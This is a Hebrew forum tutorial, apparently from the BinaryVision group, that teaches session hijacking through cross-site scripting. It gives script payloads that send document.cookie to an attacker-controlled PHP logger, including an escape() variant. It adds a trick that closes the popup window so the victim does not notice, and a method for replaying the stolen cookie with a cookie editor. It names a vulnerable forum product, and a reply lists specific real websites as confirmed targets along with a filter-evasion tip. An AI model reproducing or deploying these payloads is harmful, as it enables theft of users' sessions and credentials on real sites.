מה אצלנו על סדר היום?
============
מה זה עוגיות? ולמה זה לא אכיל?
סקירה קצרה על שיטת הפריצה
שימוש בעוגיות בJavaScript
שמירת פרמטרים בקובץ בPHP
שינוי העוגיה במחשב המקומי
איפה זה עובד?
סיום
עידכונים!
מה זה עוגיה? ולמה זה לא אכיל?
==================
עוגיה זו היא פיסת מידע הנשמרת על המחשב שלכם ע"י הדפדפן כבקשת אתר מסוים שנכנסתם עליו.
זה כבר עונה על השאלה למה זה לא אכיל...
(מעכשיו עוגיה זה גם קוקי)
הקוקי נועד לשם הפרדת משתמשים הגולשים באינטרנט, כל משתמש לגופו.
למשל משתמש אחד מחובר לאתר כשמוליק, אחר כיוסי.
משתמש אחד היה באתר 5 פעמים, אחר לא היה בכלל.
הבדלים אלה נשמרים בקוקיז (רבים של קוקי) אצלכם על המחשב במטרה לדעת מי בדיוק האדם שגולש באתר.
מטבע הדבר בקוקי נשמרים דברים יחודיים לכל משתמש, כמות פעמים שהיה באתר אחד, פעם אחרונה שביקר באתר אחר,
שם משתמש וסיסמא לאתר שלישי, וכך הלאה.
סקירה קצרה על שיטת הפריצה
================
אחרי ההסבר הקודם, חשבו רגע, מה היה קורה אילו גנבנו את הקוקי של מישהו אחר.
הינו מזדהים לאתר בדיוק כמו שהוא מזדהה ובכך נכנסים למקומות שרק הוא נכנס...
זהו עיקרון הפריצה הזאת, גניבת הקוקי.
קודם אנחנו גונבים את העוגיה בעזרת JavaScript, כמובן מוצאים קודם מקום שאפשר להריץ אותו.
ואחר-כך שומרים אותה בעזרת PHP
ואחר-כך משתמשים בה בעזרת שינוי הקוקי אצלנו במחשב.
וזהו, אנחנו מחוברים לאן שבעל הקוקי מחובר.
שימוש בעוגיות בJavaScript
===================
בשפה JavaScript יש לנו אפשרות לראות את הקוקים שנשלחים מהדפדפן לדף מסויים.
הם נשמרים במשתנה שקוראים לו Document.cookie.
אנחנ צריכים למצוא מקום שאפשר בו להריץ סקריםט JavaScript ושאנשים המחוברים יכולים לראות מקום זה.
אם למשל נשים באתר את הקוד:
<script>alert(document.cookie);
תצוץ לנו תיבת טקסט ובה יהיה כתוב בדיוק הקוקים שלנו המתקשרים לדף הנוכחי שאנחנו רואים.
כרגע זה לא עוזר לנו הרבה, כי כך כל אחד רואה את הקוקי שלו ואת שלו בלבד, ובכך לא הגענו לשום מקום.
אך מה יקרה אם אנחנו נשלח את הקוקי למקום אחר שישמור אותו בשבילנו? כך נוכל מכל משתמש לשמור את הקוקי שלו.
<script>window.open("http://somehost.com/folder/vdump.php?dump=" + document.cookie);
כפי שאתם רואים (אלא אם כן אתם לא יודעים JavaScript) הקוד הזה לפניכם מקפיץ לנו חלון-קופץ (פופ-אפ)
שמביא את הדפדפן לכתובת הבאה:
http://somehost.com/folder/vdump.php?dump= cookie>
כאן אתם כבר יכולים לראות שהקוקי שלנו, נשלח לסקריפט אחר, במקום אחר בתוך הפרמטר dump.
ז"א עברנו את המטרה של סקריםט הJavaScript שמושתל באתר.
שמירת פרמטרים בקובץ בPHP
================
עכשיו נעבור לתיכנות הסקריפט שלנו בPHP.
הסקריפט שלנו יקח את הפרמטר dump שמגיע עליו מהסקריםט בהסבר קודם, וישמור אותו בתוך קובץ.
זהו סקרפיט פשוט בPHP שנראה כך:
נשמור סקריםט זה בשרת שלנו והוא יהיה http://somehost.com/folder/vdump.php
כמובן לא נשכח ליצור בשבילו קובץ ריק varsdump.txt עם דישה מלאה עליו (CHMOD 777).
ובכך שמרנו את הקוקי שנשלח עלינו.
עכשיו בנוסף לכך, עדיף שמי שאנחנו גונבים את הקוקי ממנו לא ידע מזה, נכון?
אז אחרי הסקרפיט PHP נוסיף למטה:
<script>window.close();
שפשוט יסגור את החלון שפתח הסקריפט Javascript שהרצנו כדי שהחלון הזה לא ישאר פתוח ויחסוף אותנו.
למי שיש אינטרנט מהיר, וההוסט שאתם משתמשים בו מהיר, אפילו לא יראה שיפתח החלון.
לעומת זאת, למי שיש דפדפן שחוסם חלונות קופצים, או אינטרנט איטי רצח, ישים לב ולא נגנוב לו..
שינוי העוגיה במחשב המקומי
===============
לאחר ששמרנו את הקוקי על הסקריפט PHP כל מה שאנחנו צריכים זה לשנות את הקוקי אצלנו.
זה יותר קשה ממה שזה נשמע.
קודם כל נצטרך תוכנה חיצונית בשביל זה, כי הWindows לא יאפשר לנו סתם ככה לשנות את הקוקיז שלנו.
תוכנה טובה נקראת Cookie Editor.
אפשר למצוא אותה בגוגל, ובזמן כתיבת המדריך הלינק הבא היה פעיל להורדתה:
http://www.simtel.net/pub/dl/63805.html
עכשיו שיש לנו את התוכנה, אנחנו נשתמש בה לאתר את הקוקי שאנחנו רוצים לשנות ולשנות אותו לערכים שנמצא בקובץ שכתב לנו הסקריפט:
http://somehost.com/folder/varsdump.txt
עכשיו לתוכנה יש כמה מגבלות, אני לא חקרתי עדיין אם המגבלות בגלל התוכנה או בגלל האבטחה של האינטרנט אקספלורר.
אי אפשר ליצור קוקי חדש מכלום.
ואי אפשר לשנות את הקוקי לערך יותר ארוך ממה שהוא עכשיו.
כדי לעקוף את זה אפשר לנסות להרשם לאותו אתר כמשתמש אחר עם שם ארוך יותר ואז לשנות את הקוקי.
אני לא בטוח עדיין שהמגבלות האלה לא ניתנות לעקיפה פשוטה יותר ע"י מציאת תוכנה אחרת או משהו כזה, אבל זה עם מה שעבדתי.
אם תמצאו דרך או תוכנה יותר טובה, שימו בפורום, או כתגובה לטקסט.
לאחר שנצליח לשנות את הקוקי, מתחברים לאתר ואנחנו מחוברים בתור אותו אדם שגנבנו ממנו את העוגיה..
סוף סיפור..
איפה זה עובד?
========
כל מקום (אתר) המאפשר הרצת JavaScript במקום זה או אחר שמשתמשים מחוברים יכולים לראות אותו,
מאפשר פריצה זו.
רשימת המקומות שבהם יש אפשרות להריץ javascript: (תתעדכן עם הזמן כשאמצא עוד)
XMB Forum Penatgrim 1.8 - יש בו באג המאפשר בכנסת סקריפט להודעות פרטיות (U2U) ע"י כתיבת הסקריפט בשורה אחת שמתחילה ב
. (תג XML)
סיום
===
הרעיון מקורי שלי ככה שאם אתם נותנים לאחרים אל תשכחו לתת קצת קרדיט.
עד פה הפריצה, כל הזכויות על הקוד פה שמורות לכותב הטקסט וקבוצה BinaryVision.
נכתב ע"י Fate
BinaryVision
עידכונים!
=========
העידכונים הבאים הם תודות לBoyBear..
-----------------------------------
מה חשוב מי חשב על זה ראשון העיקר שבסוף יצא מזה משהו(מצאנו באג ועשינו אקספלויט או איך שתרצו לקרוא לזה)
דרך אגב מי שרוצה אתרים שהאקספלויט הזה יכול לפעול עליהם אז הנה
זומביט-
http://www.zombit.co.il/zombit_site/bin/en...
asp.org.il-
http://www.asp.org.il/table_list.asp?table...
בכל האתרים זה עובד(בדוק)
נ.ב.
fate מדריך מעולה
ולפי דעתי זה לא סתם באג זה באג שעובד על מלא אתרים,מערכות פורמים,מערכות ניהול וכו'
----------
טיפ קטן לפעמים יש בתוך ה cookie את התו & וזה גורם לבילבול שליחת המשתנה dump(ואז נהרס כל הבאג) בו נראה למה לדוגמא: ב cookie יש את הערך UserName=BoyBear&PassWord=hjdfdskfj ואז שאתה שולח את
ה cookie זה בעצם שולח אותו ככה: http://somehost.com/folder/vdump.php?dump=...sWord=hjdfdskfj ואז הדף php חושב שמנשים להציב לו שתי משתנים אחד: dump ששווה ל UserName=BoyBear והשני: PassWord ששווה ל hjdfdskfj
וזה גורם לבעייה כי הסקריפט ב php אמור לכתוב רק את המשתנה dump לקובץ אז בעצם הוא יכתוב רק את UserName=BoyBear ולא את ה cookie השלם שהוא UserName=BoyBear&PassWord=hjdfdskfj
אחרי שראיתי את הבעייה הזאת ישבתי וחשבתי מה אפשר לעשות אז הדעתי למסקנה שאולי אפשר להפוך את כל ה cookie ל hex וכך לא יהיה בעייה כי לא יהיה בשליחת נתונים לסקריפט את התו & בקיצור נמרץ יש פונקציה כזאת שהופכת את כל ה ascii ל hex והיא
escape אז פשוט במקום לעשות(דרך אגב יש גם פונקציה הפוכה שהופחת מ hex ל ascii והיא unescape)
<script>
window.open("http://somehost.com/folder/vdump.php?dump=" + document.cookie);
פשוט עושים
<script>
window.open("http://somehost.com/folder/vdump.php?dump=" + escape(document.cookie));
עכשיו לפי דעתי כדי לעשות %2B במקום + כי יש אתרים שחוסמים את ה + כמו asp.org.il ואם כותבים %2B במקום ה + אז אין
התחברות
הירשם כדי להגיב לנושא
